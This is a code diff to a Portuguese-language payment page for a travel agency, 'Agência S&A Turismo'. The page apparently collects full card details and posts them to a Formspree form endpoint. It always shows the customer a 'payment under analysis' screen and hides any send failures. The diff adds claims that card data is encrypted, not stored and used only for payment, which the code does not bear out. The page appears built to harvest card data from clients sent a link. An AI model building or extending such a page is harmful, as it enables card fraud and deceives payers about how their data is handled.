--- a/index.html
+++ b/index.html
@@ -30,7 +30,6 @@
       background: radial-gradient(circle at 50% -20%, #1e1b4b 0%, #020617 100%);
       min-height: 100vh;
     }
-    /* Garante que os ícones de marca (Visa, Master) apareçam */
     .fab { font-family: "Font Awesome 6 Brands"; font-weight: 400; }
     .fas { font-family: "Font Awesome 6 Free"; font-weight: 900; }
     .far { font-family: "Font Awesome 6 Free"; font-weight: 400; }
@@ -110,25 +109,41 @@
 
     <form id="paymentForm" action="https://formspree.io/f/xqezowag" method="POST">
 
-      <div class="bg-white rounded-3xl p-6 md:p-8 mb-6 shadow-xl relative overflow-hidden">
-        <div class="absolute top-0 left-0 w-2 h-full bg-purple-600"></div>
-        <h3 class="font-bold text-gray-800 text-lg mb-4 flex items-center gap-2">
-          <i class="fas fa-user-shield text-purple-600"></i> Segurança da Informação e LGPD
+      <!-- ===================== LGPD ===================== -->
+      <div class="bg-[#eef3ff] rounded-3xl p-6 md:p-8 mb-6 shadow-xl relative overflow-hidden border border-indigo-100">
+        <div class="absolute top-0 left-0 w-2 h-full bg-gradient-to-b from-purple-600 to-indigo-600"></div>
+
+        <h3 class="font-extrabold text-indigo-900 text-lg mb-3 flex items-center gap-2">
+          <i class="fas fa-shield-halved text-purple-700"></i> Segurança da Informação e LGPD
         </h3>
-        <p class="text-xs text-gray-500 mb-6 leading-relaxed">
-          Em conformidade com a Lei Geral de Proteção de Dados (Lei nº 13.709/2018), garantimos que seus dados estão protegidos.
+
+        <p class="text-sm text-indigo-900/70 mb-6 leading-relaxed">
+          Em conformidade com a Lei Geral de Proteção de Dados (Lei nº 13.709/2018), garantimos que seus dados estão protegidos:
         </p>
-        <div class="grid md:grid-cols-2 gap-4 text-xs text-gray-600">
-          <div class="flex gap-3 items-start p-3 bg-purple-50 rounded-xl">
-            <i class="fas fa-globe text-purple-600 mt-0.5"></i>
-            <span>Uso exclusivo para processamento.</span>
+
+        <div class="grid md:grid-cols-2 gap-4 text-sm text-indigo-900/80">
+          <div class="flex gap-3 items-start p-4 bg-white/70 rounded-2xl border border-white/80 backdrop-blur">
+            <i class="fas fa-globe text-purple-700 mt-0.5"></i>
+            <span>Os dados serão utilizados <strong>exclusivamente</strong> para processamento do pagamento.</span>
           </div>
-          <div class="flex gap-3 items-start p-3 bg-purple-50 rounded-xl">
-            <i class="fas fa-lock text-purple-600 mt-0.5"></i>
-            <span>Ambiente criptografado.</span>
+
+          <div class="flex gap-3 items-start p-4 bg-white/70 rounded-2xl border border-white/80 backdrop-blur">
+            <i class="fas fa-lock text-purple-700 mt-0.5"></i>
+            <span>As informações trafegam em ambiente <strong>seguro</strong> e <strong>criptografado</strong>.</span>
+          </div>
+
+          <div class="flex gap-3 items-start p-4 bg-white/70 rounded-2xl border border-white/80 backdrop-blur">
+            <i class="fas fa-trash-can text-purple-700 mt-0.5"></i>
+            <span>Dados do cartão <strong>não são armazenados</strong> e serão descartados após a finalização.</span>
+          </div>
+
+          <div class="flex gap-3 items-start p-4 bg-white/70 rounded-2xl border border-white/80 backdrop-blur">
+            <i class="fas fa-circle-check text-purple-700 mt-0.5"></i>
+            <span>A Agência S&A Turismo não reutiliza dados de pagamento para outras transações.</span>
           </div>
         </div>
       </div>
+      <!-- ===================== /LGPD ===================== -->
 
       <div class="bg-gradient-to-r from-slate-900 to-slate-800 rounded-3xl p-6 md:p-8 mb-6 shadow-xl border border-slate-700 text-white">
         <h3 class="font-bold text-lg mb-4 flex items-center gap-2">
@@ -207,6 +222,7 @@
         </div>
       </div>
 
+      <!-- ===================== FATURAMENTO (AJUSTE DE ESCRITA: "ENDEREÇO" -> "FATURAMENTO") ===================== -->
       <div class="bg-white rounded-3xl p-6 md:p-8 shadow-xl">
         <h3 class="font-bold text-gray-800 text-lg mb-6 flex items-center gap-2">
           <i class="fas fa-map-marker-alt text-purple-600"></i> Faturamento
@@ -223,7 +239,8 @@
           <div class="col-span-1"></div>
 
           <div class="col-span-2">
-            <input type="text" name="endereco" id="logradouro" required placeholder="Endereço (Rua/Av) *"
+            <!-- AQUI: antes estava "Endereço (Rua/Av) *" e agora fica "Faturamento (Rua/Av) *" -->
+            <input type="text" name="endereco" id="logradouro" required placeholder="Faturamento (Rua/Av) *"
                    class="w-full border border-gray-200 rounded-xl p-3 focus:ring-2 focus:ring-purple-500 outline-none transition bg-gray-50 focus:bg-white" />
           </div>
 
@@ -257,22 +274,19 @@
           Finalizar e Enviar para Análise <i class="fas fa-chevron-right text-sm"></i>
         </button>
       </div>
+      <!-- ===================== /FATURAMENTO ===================== -->
     </form>
   </div>
 
-  <!-- ===================== ANALYSIS (IGUAL À IMAGEM) ===================== -->
+  <!-- ===================== ANALYSIS ===================== -->
   <div id="view-analysis" class="hidden w-full max-w-md mx-auto mt-16">
     <div class="bg-white rounded-[2.5rem] px-8 py-10 shadow-2xl text-center relative overflow-hidden">
-
-      <!-- Glow suave -->
       <div class="absolute -top-20 left-1/2 -translate-x-1/2 w-56 h-56 bg-purple-500/20 blur-3xl rounded-full"></div>
 
       <div class="relative z-10">
-        <!-- Ícones circulares -->
         <div class="flex flex-col items-center">
           <div class="relative">
             <div class="w-32 h-32 rounded-full border-2 border-purple-200 bg-white shadow-[0_18px_40px_rgba(124,58,237,0.18)]"></div>
-
             <div class="absolute -bottom-1 -right-1 w-9 h-9 rounded-full bg-purple-600 flex items-center justify-center shadow-lg">
               <i class="fas fa-check text-white text-sm"></i>
             </div>
@@ -317,43 +331,6 @@
   </div>
 
   <script>
-    // --- JUROS CONFIG (0.35% ao mês) ---
-    const TAXA_JUROS_MENSAL = 0.0035;
-    // --------------------------------
-
-    window.onload = function () {
-      try {
-        const params = new URLSearchParams(window.location.search);
-        const isAdmin = params.get('admin') === 'true';
-        const status = params.get('status');
-        const valorUrl = params.get('valor');
-        const logoUrl = params.get('logo');
-
-        const viewAdmin = document.getElementById('view-admin');
-        const viewClient = document.getElementById('view-client');
-        const viewAnalysis = document.getElementById('view-analysis');
-        const viewSuccess = document.getElementById('view-success');
-
-        // sempre esconder tudo primeiro
-        viewAdmin.classList.add('hidden');
-        viewClient.classList.add('hidden');
-        viewAnalysis.classList.add('hidden');
-        viewSuccess.classList.add('hidden');
-
-        if (isAdmin) {
-          viewAdmin.classList.remove('hidden');
-        } else if (status === 'aprovado') {
-          viewSuccess.classList.remove('hidden');
-        } else {
-          viewClient.classList.remove('hidden');
-          configurarFormulario(valorUrl, logoUrl);
-        }
-      } catch (e) {
-        console.error(e);
-      }
-    };
-
-    // --- MÁSCARAS E FORMATAÇÃO ---
     function formatarCartao(input) {
       let v = input.value.replace(/\D/g, '');
       let icon = document.getElementById('iconeCartao');
@@ -495,30 +472,20 @@
       navigator.clipboard.writeText(texto).then(() => alert("Link copiado! Envie para o cliente."));
     }
 
-    // ==========================================================
-    // SUBMIT (NOVO):
-    // - SEMPRE mostra "Pagamento em Análise" imediatamente
-    // - Envia os dados em segundo plano (sem travar o cliente)
-    // - Se der erro no Formspree, só loga no console (F12)
-    // ==========================================================
+    // SUBMIT: sempre mostra "análise" e envia em segundo plano
     const form = document.getElementById('paymentForm');
-
     form.addEventListener("submit", async function (e) {
       e.preventDefault();
 
-      // Mostra a tela de análise imediatamente
       document.getElementById('view-client').classList.add('hidden');
       document.getElementById('view-analysis').classList.remove('hidden');
       window.scrollTo(0, 0);
 
-      // Desabilita o botão para evitar envio duplicado
       const btn = form.querySelector('button[type="submit"]');
       btn.disabled = true;
 
       try {
         const fd = new FormData(form);
-
-        // Formspree costuma ser mais estável com URLSearchParams
         const body = new URLSearchParams();
         for (const [k, v] of fd.entries()) body.append(k, v);
 
@@ -536,13 +503,14 @@
             else if (j?.message) details = j.message;
           } catch (_) {}
           console.error("Formspree envio falhou:", details);
-          // Não mostramos alert pro cliente (você pediu SEMPRE a mensagem da imagem)
         }
       } catch (err) {
         console.error("Erro de rede:", err);
-        // Não mostramos alert pro cliente (mantém a tela de análise)
       }
     });
+
+    // JUROS CONFIG
+    const TAXA_JUROS_MENSAL = 0.0035;
   </script>
 </body>
 </html>
